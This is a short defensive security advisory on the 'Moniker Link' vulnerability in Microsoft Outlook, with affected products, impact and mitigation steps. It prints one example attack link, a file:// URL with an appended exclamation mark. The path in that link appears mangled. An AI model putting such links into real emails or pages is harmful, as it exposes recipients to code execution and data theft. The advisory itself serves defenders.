Advisory: Critical Microsoft Outlook Vulnerability

Overview

A Checkpoint security researcher has discovered a critical vulnerability in Microsoft Outlook that poses an imminent and serious cybersecurity risk to users.  This new risk allows threat actors to use a specially crafted malicious email to exploit the Outlook client with a zero-day vulnerability exploit. This exploit is being actively exploited in the wild as of this article and patches are available from Microsoft to fix the issue.

The ‘Moniker Link’ Attack Vulnerability Details

The “Moniker Link” attack allows threat actors to bypass Outlook’s built-in protected-mode safeguards. This approach involves embedding malicious links in emails via the file:// protocol and appending an exclamation mark to URLs that lead to attacker-controlled servers.

For example, an attack URL might be:

<a href=”file:///\192.168.1.1testtest.rtf!moretext”>CLICK ME</a>

The flaw enables attackers to execute arbitrary code on a victim’s system simply by delivering a malicious email. In some cases, the email does not require user interaction to trigger the exploit, simply by opening the email in Preview mode, the attack detonates. Once exploited, attackers can gain unauthorized access, install malware, steal sensitive data, or take control of affected systems!

The vulnerability impacts multiple Office products, including:

• Microsoft Office LTSC 2021
• Microsoft 365 Apps for Enterprise
• Microsoft Outlook 2016
• Microsoft Office 2019

Potential Impact

Organizations and individual users who rely on Microsoft Outlook for email communication are at high risk. The vulnerability can:

• Allow remote code execution without user interaction.
• Enable attackers to deploy ransomware, spyware, or other malicious software.
• Lead to data breaches and unauthorized access to corporate networks.

Mitigation Steps

Microsoft has released official security patches and users are strongly advised to install them immediately.   If you are unable to patch immediately, you can take the following mitigating measures:

1. Apply Temporary Security Measures: Restrict access to Outlook or disable automatic email previews to reduce exposure.
2. Enable Advanced Threat Protection (ATP): If using Microsoft 365, ensure that ATP is enabled to detect and block malicious attachments.
3. Implement Network Segmentation: Limit access to sensitive data by segmenting networks and restricting unnecessary privileges.
4. Monitor for Suspicious Activity: Regularly check logs and security alerts for unusual activity related to Outlook.

Conclusion

This Microsoft Outlook vulnerability is a very serious security threat that requires immediate patching. Organizations unable to immediately patch must implement the temporary protections. Please deploy Microsoft’s security patch as soon as you are able. Taking proactive steps now can help prevent potential cyberattacks and safeguard critical information.

For the latest Microsoft updates on this vulnerability, please view the link below.